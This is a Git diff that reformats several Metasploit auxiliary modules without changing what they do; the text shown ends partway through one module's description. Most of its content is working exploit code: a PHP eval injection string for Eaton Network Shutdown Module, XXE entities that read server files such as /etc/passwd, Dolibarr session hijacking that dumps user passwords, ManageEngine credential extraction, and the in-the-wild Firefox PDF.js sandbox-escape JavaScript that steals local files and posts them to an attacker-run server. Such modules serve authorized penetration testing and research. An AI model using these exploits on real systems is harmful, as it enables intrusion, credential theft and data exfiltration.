'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'),
'cookie' => @cookie,
'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'
),
'cookie' => @cookie,
'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] }
})
if !res
@@ -69,21 +73,21 @@ class MetasploitModule < Msf::Auxiliary
def get_user_info(user_id)
vprint_status("Retrieving user's credentials")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie,
'vars_get' => Hash[{
'action' => 'edit',
'id' => "#{user_id}"
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie,
'vars_get' => Hash[{
'action' => 'edit',
'id' => "#{user_id}"
}.to_a.shuffle]
})
if !res
print_error("Connection failed")
elsif res.body =~ /User card/
record = [
res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first,
res.body.scan(/name="password" value="([^"]+)"/ ).flatten.first,
res.body.scan(/name="superadmin" value="\d">(Yes|No)/ ).flatten.first,
res.body.scan(/name="login" value="([^"]+)"/).flatten.first,
res.body.scan(/name="password" value="([^"]+)"/).flatten.first,
res.body.scan(/name="superadmin" value="\d">(Yes|No)/).flatten.first,
res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first
]
unless record.empty?
@@ -100,8 +104,8 @@ class MetasploitModule < Msf::Auxiliary
#
def get_user_id
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie
})
if !res
print_error("Connection failed")
@@ -119,8 +123,8 @@ class MetasploitModule < Msf::Auxiliary
#
def create_cookie(token)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
})
if !res
print_error("Connection failed")
@@ -136,7 +140,7 @@ class MetasploitModule < Msf::Auxiliary
# Stolen from modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
#
def progress(current, total)
done = (current.to_f / total.to_f) * 100
done = (current.to_f / total.to_f) * 100
percent = "%3.2f%%" % done.to_f
vprint_status("Trying to hijack a session - " +
"%7s done (%d/%d tokens)" % [percent, current, total])
@@ -177,6 +181,7 @@ class MetasploitModule < Msf::Auxiliary
def run
return unless tokens = get_session_tokens
credentials = []
print_status("Trying to hijack a session...")
tokens.flatten.each_with_index do |token, index|
@@ -191,8 +196,8 @@ class MetasploitModule < Msf::Auxiliary
return
end
cred_table = Rex::Text::Table.new(
'Header' => 'Dolibarr User Credentials',
'Indent' => 1,
'Header' => 'Dolibarr User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password', 'Admin', 'E-mail']
)
credentials.each do |record|
@@ -208,17 +213,18 @@ class MetasploitModule < Msf::Auxiliary
end
print_line
print_line("#{cred_table}")
loot_name = 'dolibarr.traversal.user.credentials'
loot_type = 'text/csv'
loot_name = 'dolibarr.traversal.user.credentials'
loot_type = 'text/csv'
loot_filename = 'dolibarr_user_creds.csv'
loot_desc = 'Dolibarr User Credentials'
loot_desc = 'Dolibarr User Credentials'
p = store_loot(
loot_name,
loot_type,
rhost,
cred_table.to_csv,
loot_filename,
loot_desc)
loot_desc
)
print_status("Credentials saved in: #{p}")
end
end
modules/auxiliary/gather/drupal_openid_xxe.rb
+30 -28
View File
@@ -9,23 +9,23 @@ class MetasploitModule < Msf::Auxiliary
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal OpenID External Entity Injection',
'Description' => %q{
This module abuses an XML External Entity Injection
vulnerability on the OpenID module from Drupal. The vulnerability exists
in the parsing of a malformed XRDS file coming from a malicious OpenID
endpoint. This module has been tested successfully on Drupal 7.15 and
7.2 with the OpenID module enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'Drupal OpenID External Entity Injection',
'Description' => %q{
This module abuses an XML External Entity Injection
vulnerability on the OpenID module from Drupal. The vulnerability exists
in the parsing of a malformed XRDS file coming from a malicious OpenID
endpoint. This module has been tested successfully on Drupal 7.15 and
7.2 with the OpenID module enabled.
},
'License' => MSF_LICENSE,
'Author' => [
'Reginaldo Silva', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2012-4554' ],
[ 'OSVDB', '86429' ],
[ 'BID', '56103' ],
@@ -33,21 +33,22 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://github.com/drupal/drupal/commit/b9127101ffeca819e74a03fa9f5a48d026c562e5' ],
[ 'URL', 'https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]
],
'DisclosureDate' => '2012-10-17'
))
'DisclosureDate' => '2012-10-17'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, "Base Drupal directory path", '/drupal']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
])
]
)
end
def xrds_file
element_entity = <<-EOF
<!ELEMENT URI ANY>
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
element_entity = <<~EOF
<!ELEMENT URI ANY>
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
EOF
xml = Document.new
@@ -57,10 +58,11 @@ class MetasploitModule < Msf::Auxiliary
xml.add_element(
"xrds:XRDS",
{
'xmlns:xrds' => "xri://$xrds",
'xmlns' => "xri://$xrd*($v*2.0)",
'xmlns:xrds' => "xri://$xrds",
'xmlns' => "xri://$xrd*($v*2.0)",
'xmlns:openid' => "http://openid.net/xmlns/1.0",
})
}
)
xrd = xml.root.add_element("XRD")
@@ -150,7 +152,6 @@ class MetasploitModule < Msf::Auxiliary
service.stop
end
def on_request_uri(cli, request)
if request.uri =~ /#{@prefix}/
vprint_status("Signature found, parsing file...")
@@ -164,7 +165,7 @@ class MetasploitModule < Msf::Auxiliary
def send_openid_auth(identifier)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "/"),
'uri' => normalize_uri(target_uri.to_s, "/"),
'method' => 'POST',
'vars_get' => {
"q" => "node",
@@ -205,6 +206,7 @@ class MetasploitModule < Msf::Auxiliary
def loot?(data)
return false if data.blank?
store(data)
return true
end
@@ -213,6 +215,7 @@ class MetasploitModule < Msf::Auxiliary
return false if http_response.blank?
return false unless http_response.code == 200
return false unless http_response.body =~ /openid_identifier.*#{signature}/
return true
end
@@ -220,9 +223,8 @@ class MetasploitModule < Msf::Auxiliary
return false if http_response.blank?
return true if http_response.headers['X-Generator'] and http_response.headers['X-Generator'] =~ /Drupal/
return true if http_response.body and http_response.body.to_s =~ /meta.*Generator.*Drupal/
return false
end
end
modules/auxiliary/gather/eaton_nsm_creds.rb
+33 -30
View File
@@ -8,45 +8,47 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Network Shutdown Module sort_values Credential Dumper',
'Description' => %q{
This module will extract user credentials from Network Shutdown Module
versions 3.21 and earlier by exploiting a vulnerability found in
lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
Please note that in order to extract credentials, the vulnerable service
must have at least one USV module (an entry in the "nodes" table in
mgedb.db).
},
'References' =>
[
super(
update_info(
info,
'Name' => 'Network Shutdown Module sort_values Credential Dumper',
'Description' => %q{
This module will extract user credentials from Network Shutdown Module
versions 3.21 and earlier by exploiting a vulnerability found in
lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
Please note that in order to extract credentials, the vulnerable service
must have at least one USV module (an entry in the "nodes" table in
mgedb.db).
},
'References' => [
['OSVDB', '83199'],
['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
],
'Author' =>
[
'Author' => [
'h0ng10',
'sinn3r'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2012-06-26'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2012-06-26'
)
)
register_options(
[
Opt::RPORT(4679)
])
]
)
end
def execute_php_code(code, opts = {})
param_name = Rex::Text.rand_text_alpha(6)
padding = Rex::Text.rand_text_alpha(6)
php_code = Rex::Text.encode_base64(code)
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
padding = Rex::Text.rand_text_alpha(6)
php_code = Rex::Text.encode_base64(code)
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
res = send_request_cgi(
{
'uri' => '/view_list.php',
'uri' => '/view_list.php',
'method' => 'POST',
'vars_get' =>
{
@@ -60,14 +62,15 @@ class MetasploitModule < Msf::Auxiliary
{
'Connection' => 'Close'
}
})
}
)
res
end
def read_credentials
pattern = Rex::Text.rand_text_numeric(10)
pattern = Rex::Text.rand_text_numeric(10)
users_var = Rex::Text.rand_text_alpha(10)
user_var = Rex::Text.rand_text_alpha(10)
user_var = Rex::Text.rand_text_alpha(10)
php = <<-EOT
$#{users_var} = &queryDB("SELECT * FROM configUsers;");
foreach($#{users_var} as $#{user_var}) {
@@ -96,8 +99,8 @@ class MetasploitModule < Msf::Auxiliary
end
cred_table = Rex::Text::Table.new(
'Header' => 'Network Shutdown Module Credentials',
'Indent' => 1,
'Header' => 'Network Shutdown Module Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password']
)
@@ -108,10 +111,10 @@ class MetasploitModule < Msf::Auxiliary
print_line
print_line(cred_table.to_s)
loot_name = "eaton.nsm.credentials"
loot_type = "text/csv"
loot_name = "eaton.nsm.credentials"
loot_type = "text/csv"
loot_filename = "eaton_nsm_creds.csv"
loot_desc = "Eaton Network Shutdown Module Credentials"
loot_desc = "Eaton Network Shutdown Module Credentials"
p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)
print_good("Credentials saved in: #{p.to_s}")
end
modules/auxiliary/gather/emc_cta_xxe.rb
+16 -16
View File
@@ -7,25 +7,26 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
'Description' => %q{
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
that allows an attacker to read arbitrary files from the file system
with the permissions of the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
super(
update_info(
info,
'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
'Description' => %q{
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
that allows an attacker to read arbitrary files from the file system
with the permissions of the root user.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
],
'References' =>
[
'References' => [
['CVE', '2014-0644'],
['EDB', '32623']
],
'DisclosureDate' => '2014-03-31'
))
'DisclosureDate' => '2014-03-31'
)
)
register_options(
[
@@ -38,7 +39,6 @@ class MetasploitModule < Msf::Auxiliary
end
def run
doctype = Rex::Text.rand_text_alpha(6)
element = Rex::Text.rand_text_alpha(6)
entity = Rex::Text.rand_text_alpha(6)
modules/auxiliary/gather/enum_dns.rb
+25 -19
View File
@@ -3,27 +3,30 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DNS::Enumeration
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Record Scanner and Enumerator',
'Description' => %q(
This module can be used to gather information about a domain from a
given DNS server by performing various DNS queries such as zone
transfers, reverse lookups, SRV record brute forcing, and other techniques.
),
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Nixawk'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '1999-0532'],
['OSVDB', '492']
]))
super(
update_info(
info,
'Name' => 'DNS Record Scanner and Enumerator',
'Description' => %q{
This module can be used to gather information about a domain from a
given DNS server by performing various DNS queries such as zone
transfers, reverse lookups, SRV record brute forcing, and other techniques.
},
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Nixawk'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '1999-0532'],
['OSVDB', '492']
]
)
)
register_options(
[
@@ -43,7 +46,8 @@ class MetasploitModule < Msf::Auxiliary
OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
OptInt.new('THREADS', [false, 'Threads for ENUM_BRT', 1]),
OptPath.new('WORDLIST', [false, 'Wordlist of subdomains', ::File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')])
])
]
)
register_advanced_options(
[
@@ -51,7 +55,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('RETRY', [false, 'Number of times to try to resolve a record if no response is received', 2]),
OptInt.new('RETRY_INTERVAL', [false, 'Number of seconds to wait before doing a retry', 2]),
OptBool.new('TCP_DNS', [false, 'Run queries over TCP', false])
])
]
)
deregister_options('DnsClientUdpTimeout', 'DnsClientRetry', 'DnsClientRetryInterval', 'DnsClientTcpDns')
end
@@ -89,6 +94,7 @@ class MetasploitModule < Msf::Auxiliary
dns_reverse(datastore['IPRANGE'], threads) if datastore['ENUM_RVL']
return unless datastore['ENUM_BRT']
if is_wildcard
dns_bruteforce(domain, datastore['WORDLIST'], threads) unless datastore['STOP_WLDCRD']
else
modules/auxiliary/gather/eventlog_cred_disclosure.rb
+36 -35
View File
@@ -10,40 +10,42 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
'Description' => %q{
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
allow an unauthenticated user to obtain the superuser password of any managed Windows and
AS/400 hosts. This module abuses both vulnerabilities to collect all the available
usernames and passwords. First the agentHandler servlet is abused to get the hostid and
slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
the TARGETURI has to be prepended with /event.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
'Description' => %q{
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
allow an unauthenticated user to obtain the superuser password of any managed Windows and
AS/400 hosts. This module abuses both vulnerabilities to collect all the available
usernames and passwords. First the agentHandler servlet is abused to get the hostid and
slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
the TARGETURI has to be prepended with /event.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2014-6038' ],
[ 'CVE', '2014-6039' ],
[ 'OSVDB', '114342' ],
[ 'OSVDB', '114344' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/12' ]
],
'DisclosureDate' => '2014-11-05'))
'DisclosureDate' => '2014-11-05'
)
)
register_options(
[
Opt::RPORT(8400),
OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
])
OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
]
)
end
def decode_password(encoded_password)
password_xor = Rex::Text.decode_base64(encoded_password)
password = ''
@@ -53,11 +55,10 @@ class MetasploitModule < Msf::Auxiliary
return password
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'agentHandler'),
'method' =>'GET',
'method' => 'GET',
'vars_get' => {
'mode' => 'getTableData',
'table' => 'HostDetails'
@@ -72,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
# When passwords have digits the XML parsing will fail.
# Replace with an empty password attribute so that we know the device has a password
# and therefore we want to add it to our host list.
xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))
xml = res.body.to_s.gsub(/&#[0-9]*;/, Rex::Text.rand_text_alpha(6))
begin
doc = REXML::Document.new(xml)
rescue
@@ -89,8 +90,8 @@ class MetasploitModule < Msf::Auxiliary
end
cred_table = Rex::Text::Table.new(
'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
'Indent' => 1,
'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
'Indent' => 1,
'Columns' =>
[
'Host',
@@ -105,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
slid_host_ary.each do |host|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'hostdetails'),
'method' =>'GET',
'method' => 'GET',
'vars_get' => {
'slid' => host[0],
'hostid' => host[1]
@@ -160,9 +161,9 @@ class MetasploitModule < Msf::Auxiliary
end
credential_core = report_credential_core({
password: password,
username: username,
})
password: password,
username: username,
})
host_login_data = {
address: host_ipaddress,
@@ -180,22 +181,22 @@ class MetasploitModule < Msf::Auxiliary
print_line
print_line("#{cred_table}")
loot_name = 'manageengine.eventlog.managed_hosts.creds'
loot_type = 'text/csv'
loot_name = 'manageengine.eventlog.managed_hosts.creds'
loot_type = 'text/csv'
loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'
loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
p = store_loot(
loot_name,
loot_type,
rhost,
cred_table.to_csv,
loot_filename,
loot_desc)
loot_desc
)
print_status "Credentials saved in: #{p}"
end
def report_credential_core(cred_opts={})
def report_credential_core(cred_opts = {})
# Set up the has for our Origin service
origin_service_data = {
address: rhost,
modules/auxiliary/gather/external_ip.rb
+9 -9
View File
@@ -11,19 +11,18 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'Discover External IP via Ifconfig.me',
'Name' => 'Discover External IP via Ifconfig.me',
'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://ifconfig.me/ip' ],
],
'References' => [
[ 'URL', 'http://ifconfig.me/ip' ],
],
'DefaultOptions' => { 'VHOST' => 'ifconfig.me' }
)
@@ -31,12 +30,13 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RHOST('ifconfig.me'),
OptBool.new('REPORT_HOST', [false, 'Add the found IP to the database', false])
])
end
]
)
end
def run
connect
res = send_request_cgi({'uri' => '/ip', 'method' => 'GET' })
res = send_request_cgi({ 'uri' => '/ip', 'method' => 'GET' })
if res.nil?
print_error("Connection timed out")
modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb
+1 -1
View File
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Auxiliary
# Reporting found cookie name in database
unless cookie_name.empty?
report_note(host: rhost, type: 'f5_load_balancer_cookie_name', data: {:cookie_name => cookie_name })
report_note(host: rhost, type: 'f5_load_balancer_cookie_name', data: { :cookie_name => cookie_name })
# Reporting found pool name in database
unless pool_name.empty?
report_note(host: rhost, type: 'f5_load_balancer_pool_name', data: { :pool_name => pool_name })
modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+169 -168
View File
@@ -7,34 +7,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Firefox PDF.js Browser File Theft',
'Description' => %q{
This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
privileges to read local files. The in-the-wild malicious payloads searched for sensitive
files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
do not use the Mozilla PDF viewer.
},
'Author' => [
'Unknown', # From an 0day served on Russian news website
'fukusa', # Hacker news member that reported the issue
'Unknown' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Firefox PDF.js Browser File Theft',
'Description' => %q{
This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
privileges to read local files. The in-the-wild malicious payloads searched for sensitive
files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
do not use the Mozilla PDF viewer.
},
'Author' => [
'Unknown', # From an 0day served on Russian news website
'fukusa', # Hacker news member that reported the issue
'Unknown' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
['URL', 'https://paste.debian.net/290146'], # 0day exploit
['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer
['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'],
['CVE', '2015-4495']
],
'DefaultAction' => 'WebServer'
))
'DefaultAction' => 'WebServer'
)
)
register_options([
OptString.new('FILES', [
@@ -88,12 +90,11 @@ class MetasploitModule < Msf::Auxiliary
proto = (datastore['SSL'] ? 'https' : 'http')
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
"#{proto}://#{my_host}#{port_str}#{resource}/catch"
end
def file_payload
%Q|
var files = (#{JSON.generate(file_urls)});
@@ -118,158 +119,158 @@ class MetasploitModule < Msf::Auxiliary
end
def js
<<-EOJS
function xml2string(obj) {
return new XMLSerializer().serializeToString(obj);
}
<<~EOJS
function xml2string(obj) {
return new XMLSerializer().serializeToString(obj);
}
function __proto(obj) {
return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}
function __proto(obj) {
return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}
function get(path, callback, timeout, template, value) {
callback = _(callback);
if (template && value) {
callback = callback.replace(template, value);
}
js_call1 = 'javascript:' + _(function() {
try {
open("%url%", "_self");
} catch (e) {
history.back();
}
undefined;
}, "%url%", path);
js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
sandboxContext(_(function() {
i = document.getElementById('i');
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
i2 = document.getElementById('i2');
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
}));
setTimeout((function() {
sandboxContext(_(function() {
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
}));
}), timeout);
}
function get_data(obj) {
data = null;
try {
data = obj.document.documentElement.innerHTML;
if (data.indexOf('dirListing') < 0) {
throw new Error();
}
} catch (e) {
if (this.document instanceof XMLDocument) {
data = xml2string(this.document);
} else {
try {
if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
data = this.document.body.firstChild.textContent;
} else {
throw new Error();
function get(path, callback, timeout, template, value) {
callback = _(callback);
if (template && value) {
callback = callback.replace(template, value);
}
js_call1 = 'javascript:' + _(function() {
try {
open("%url%", "_self");
} catch (e) {
history.back();
}
} catch (e) {
undefined;
}, "%url%", path);
js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
sandboxContext(_(function() {
i = document.getElementById('i');
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
i2 = document.getElementById('i2');
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
}));
setTimeout((function() {
sandboxContext(_(function() {
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
l = p.__lookupSetter__.call(i2.contentWindow, 'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
}));
}), timeout);
}
function get_data(obj) {
data = null;
try {
if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
return null;
} else {
throw new Error();
data = obj.document.documentElement.innerHTML;
if (data.indexOf('dirListing') < 0) {
throw new Error();
}
} catch (e) {
;;
if (this.document instanceof XMLDocument) {
data = xml2string(this.document);
} else {
try {
if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
data = this.document.body.firstChild.textContent;
} else {
throw new Error();
}
} catch (e) {
try {
if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
return null;
} else {
throw new Error();
}
} catch (e) {
;;
}
}
}
}
return data;
}
function _(s, template, value) {
s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
s = s.substring(0, s.length - 1);
if (template && value) {
s = s.replace(template, value);
}
s += __proto;
s += xml2string;
s += get_data;
s = s.replace(/\\s\\/\\/.*\\n/g, "");
s = s + ";undefined";
return s;
}
function get_sandbox_context() {
if (window.my_win_id == null) {
for (var i = 0; i < 20; i++) {
try {
if (window[i].location.toString().indexOf("view-source:") != -1) {
my_win_id = i;
break;
}
} catch (e) {}
}
};
if (window.my_win_id == null)
return;
clearInterval(sandbox_context_i);
object.data = 'view-source:' + blobURL;
window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
object.data = 'data:text/html,<'+'html/>';
window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
'"position:absolute; left:-9999px;" onload = "'+_(function(){
window.wrappedJSObject.sandboxContext=(function(cmd) {
with(importFunction.constructor('return this')()) {
return eval(cmd);
}
});
}) + '"/>');
}
var i = document.createElement("iframe");
i.id = "i";
i.width=i.height=0;
i.style='position:absolute;left:-9999px;';
i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
document.documentElement.appendChild(i);
i.onload = function() {
if (this.contentDocument.styleSheets.length > 0) {
var i2 = document.createElement("iframe");
i2.id = "i2";
i2.width=i2.height=0;
i2.style='position:absolute;left:-9999px;';
i2.src = "data:application/pdf,";
document.documentElement.appendChild(i2);
pdfBlob = new Blob([''], {
type: 'application/pdf'
});
blobURL = URL.createObjectURL(pdfBlob);
object = document.createElement('object');
object.data = 'data:application/pdf,';
object.onload = (function() {
sandbox_context_i = setInterval(get_sandbox_context, 200);
object.onload = null;
object.data = 'view-source:' + location.href;
return;
});
document.documentElement.appendChild(object);
} else {
this.contentWindow.location.reload();
}
}
}
}
return data;
}
function _(s, template, value) {
s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
s = s.substring(0, s.length - 1);
if (template && value) {
s = s.replace(template, value);
}
s += __proto;
s += xml2string;
s += get_data;
s = s.replace(/\\s\\/\\/.*\\n/g, "");
s = s + ";undefined";
return s;
}
function get_sandbox_context() {
if (window.my_win_id == null) {
for (var i = 0; i < 20; i++) {
try {
if (window[i].location.toString().indexOf("view-source:") != -1) {
my_win_id = i;
break;
var kill = setInterval(function() {
if (window.sandboxContext) {
clearInterval(kill);
} else {
return;
}
} catch (e) {}
}
};
if (window.my_win_id == null)
return;
clearInterval(sandbox_context_i);
object.data = 'view-source:' + blobURL;
window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
object.data = 'data:text/html,<'+'html/>';
window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
'"position:absolute; left:-9999px;" onload = "'+_(function(){
window.wrappedJSObject.sandboxContext=(function(cmd) {
with(importFunction.constructor('return this')()) {
return eval(cmd);
}
});
}) + '"/>');
}
var i = document.createElement("iframe");
i.id = "i";
i.width=i.height=0;
i.style='position:absolute;left:-9999px;';
i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
document.documentElement.appendChild(i);
i.onload = function() {
if (this.contentDocument.styleSheets.length > 0) {
var i2 = document.createElement("iframe");
i2.id = "i2";
i2.width=i2.height=0;
i2.style='position:absolute;left:-9999px;';
i2.src = "data:application/pdf,";
document.documentElement.appendChild(i2);
pdfBlob = new Blob([''], {
type: 'application/pdf'
});
blobURL = URL.createObjectURL(pdfBlob);
object = document.createElement('object');
object.data = 'data:application/pdf,';
object.onload = (function() {
sandbox_context_i = setInterval(get_sandbox_context, 200);
object.onload = null;
object.data = 'view-source:' + location.href;
return;
});
document.documentElement.appendChild(object);
} else {
this.contentWindow.location.reload();
}
}
var kill = setInterval(function() {
if (window.sandboxContext) {
clearInterval(kill);
} else {
return;
}
EOJS
EOJS
end
end
modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb
+28 -24
View File
@@ -10,33 +10,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
'Description' => %q{
A website that serves a JSONP endpoint that accepts a custom alphanumeric
callback of 1200 chars can be abused to serve an encoded swf payload that
